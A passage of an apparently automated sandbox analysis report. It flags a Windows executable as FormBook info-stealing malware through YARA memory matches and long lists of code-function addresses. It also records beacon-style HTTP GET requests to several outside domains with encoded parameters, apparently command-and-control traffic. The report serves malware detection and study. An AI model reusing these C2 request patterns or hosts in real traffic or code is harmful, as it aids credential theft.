        Source: global trafficHTTP traffic detected: GET /wn19/?jZf=QQL+SjwgUyPYxJnw2qa+Hze/zpoAw1vY2ZXVt5QHdkoKCL+B47r8V4uCmI0quTqEBnpn&1biX=C2MPnN HTTP/1.1Host: www.intelios.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /wn19/?jZf=/aPRIOivZv/SK3yyBSrwMHS3aEcDnGoJdVwaw0Jv+PFvpIBjQ3dFVdba2CvjMIDrv82h&1biX=C2MPnN HTTP/1.1Host: www.herbalsfixng.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /wn19/?jZf=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&1biX=C2MPnN HTTP/1.1Host: www.schnellekreditfinanz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /wn19/?jZf=74kz/+Omydv/tJV+ps5/T47bI5nxKh+DjdkrvIsUcwHn/m5f3NJjyQUUG1A7gP1GNjyQ&k0=p8cH HTTP/1.1Host: www.nelvashop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /wn19/?jZf=rv1HgXCmNvTRWnk0t/PWMZTArWSxwY6VToXu23C5wd0SYVqo5hbnUnFufPtPTohMYlmc&k0=p8cH HTTP/1.1Host: www.threads34.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 1_2_004056BB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_004056BB

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000000.42080260452.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.42265914211.000000001D3A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.42240670582.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.46596157164.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000A.00000000.42080260452.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000A.00000000.42080260452.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000002.42265914211.000000001D3A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000002.42265914211.000000001D3A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000002.42240670582.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000002.42240670582.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000002.46596157164.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.46596157164.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: aSsc9zh1ex.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: 0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000A.00000000.42080260452.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000A.00000000.42080260452.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000002.42265914211.000000001D3A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000002.42265914211.000000001D3A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000002.42240670582.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000002.42240670582.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000E.00000002.46596157164.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.46596157164.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 1_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040350A
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 1_2_6F001BFF1_2_6F001BFF
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EFDF47_2_1D7EFDF4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D759DD07_2_1D759DD0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80FD277_2_1D80FD27
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D807D4C7_2_1D807D4C
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753C607_2_1D753C60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7D7CE87_2_1D7D7CE8
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76FCE07_2_1D76FCE0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7E9C987_2_1D7E9C98
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CFF407_2_1D7CFF40
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D801FC67_2_1D801FC6
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80FF637_2_1D80FF63
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D809ED27_2_1D809ED2
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D751EB27_2_1D751EB2
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7959C07_2_1D7959C0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7598707_2_1D759870
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76B8707_2_1D76B870
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7C58707_2_1D7C5870
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D8018DA7_2_1D8018DA
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D8078F37_2_1D8078F3
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7538007_2_1D753800
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7C98B27_2_1D7C98B2
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80F8727_2_1D80F872
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D78DB197_2_1D78DB19
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80FB2E7_2_1D80FB2E
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80FA897_2_1D80FA89
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76FAA07_2_1D76FAA0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D8075C67_2_1D8075C6
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80F5C97_2_1D80F5C9
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7BD4807_2_1D7BD480
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FD6467_2_1D7FD646
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7ED62C7_2_1D7ED62C
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80F6F67_2_1D80F6F6
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7C36EC7_2_1D7C36EC
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D79717A7_2_1D79717A
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7ED1307_2_1D7ED130
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F1137_2_1D73F113
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76B1E07_2_1D76B1E0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7551C07_2_1D7551C0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D8070F17_2_1D8070F1
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D75B0D07_2_1D75B0D0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D78508C7_2_1D78508C
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80F3307_2_1D80F330
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7413807_2_1D741380
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73D2EC7_2_1D73D2EC
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80124C7_2_1D80124C
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D750D697_2_1D750D69
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74AD007_2_1D74AD00
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D762DB07_2_1D762DB0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FEC4C7_2_1D7FEC4C
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D75AC207_2_1D75AC20
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CEC207_2_1D7CEC20
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D740C127_2_1D740C12
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D81ACEB7_2_1D81ACEB
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D768CDF7_2_1D768CDF
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80EC607_2_1D80EC60
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D806C697_2_1D806C69
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80EFBF7_2_1D80EFBF
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D75CF007_2_1D75CF00
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D756FE07_2_1D756FE0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7F0E6D7_2_1D7F0E6D
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D770E507_2_1D770E50
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D800EAD7_2_1D800EAD
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D792E487_2_1D792E48
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D742EE87_2_1D742EE8
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80E9A67_2_1D80E9A6
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74E9A07_2_1D74E9A0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7368687_2_1D736868
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7F08357_2_1D7F0835
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77E8107_2_1D77E810
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7528C07_2_1D7528C0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7668827_2_1D766882
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D750B107_2_1D750B10
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7C4BC07_2_1D7C4BC0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80CA137_2_1D80CA13
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80EA5B7_2_1D80EA5B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D81A5267_2_1D81A526
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7504457_2_1D750445
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D75A7607_2_1D75A760
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7527607_2_1D752760
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D8067577_2_1D806757
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7746707_2_1D774670
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80A6C07_2_1D80A6C0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76C6007_2_1D76C600
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74C6E07_2_1D74C6E0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7506807_2_1D750680
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D81010E7_2_1D81010E
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FE0767_2_1D7FE076
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7400A07_2_1D7400A0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D75E3107_2_1D75E310
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0467044514_2_04670445
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0473A52614_2_0473A526
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0469467014_2_04694670
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0468C60014_2_0468C600
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466C6E014_2_0466C6E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0472A6C014_2_0472A6C0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0467068014_2_04670680
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0467A76014_2_0467A760
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0467276014_2_04672760
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0472675714_2_04726757
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0471E07614_2_0471E076
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046600A014_2_046600A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0473010E14_2_0473010E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0467E31014_2_0467E310
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0472EC6014_2_0472EC60
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04726C6914_2_04726C69
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0471EC4C14_2_0471EC4C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0467AC2014_2_0467AC20
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046EEC2014_2_046EEC20
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04660C1214_2_04660C12
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0473ACEB14_2_0473ACEB
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04688CDF14_2_04688CDF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04670D6914_2_04670D69
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466AD0014_2_0466AD00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04682DB014_2_04682DB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04710E6D14_2_04710E6D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B2E4814_2_046B2E48
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04690E5014_2_04690E50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04662EE814_2_04662EE8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04720EAD14_2_04720EAD
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0467CF0014_2_0467CF00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04676FE014_2_04676FE0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0472EFBF14_2_0472EFBF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0465686814_2_04656868
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0471083514_2_04710835
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0469E81014_2_0469E810
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046728C014_2_046728C0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0468688214_2_04686882
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466E9A014_2_0466E9A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0472E9A614_2_0472E9A6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0472EA5B14_2_0472EA5B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0472CA1314_2_0472CA13
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04670B1014_2_04670B10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046E4BC014_2_046E4BC0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046DD48014_2_046DD480
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_047275C614_2_047275C6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0472F5C914_2_0472F5C9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0471D64614_2_0471D646
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0470D62C14_2_0470D62C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046E36EC14_2_046E36EC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0472F6F614_2_0472F6F6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_047270F114_2_047270F1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0467B0D014_2_0467B0D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A508C14_2_046A508C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B717A14_2_046B717A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0470D13014_2_0470D130
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0465F11314_2_0465F113
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0468B1E014_2_0468B1E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046751C014_2_046751C0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0472124C14_2_0472124C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0465D2EC14_2_0465D2EC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0472F33014_2_0472F330
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0466138014_2_04661380
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04673C6014_2_04673C60
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046F7CE814_2_046F7CE8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0468FCE014_2_0468FCE0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04709C9814_2_04709C98
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04727D4C14_2_04727D4C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0472FD2714_2_0472FD27
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0470FDF414_2_0470FDF4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04679DD014_2_04679DD0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04729ED214_2_04729ED2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04671EB214_2_04671EB2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0472FF6314_2_0472FF63
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046EFF4014_2_046EFF40
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04721FC614_2_04721FC6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0472F87214_2_0472F872
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0467987014_2_04679870
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0468B87014_2_0468B870
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046E587014_2_046E5870
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0467380014_2_04673800
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_047278F314_2_047278F3
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_047218DA14_2_047218DA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046E98B214_2_046E98B2
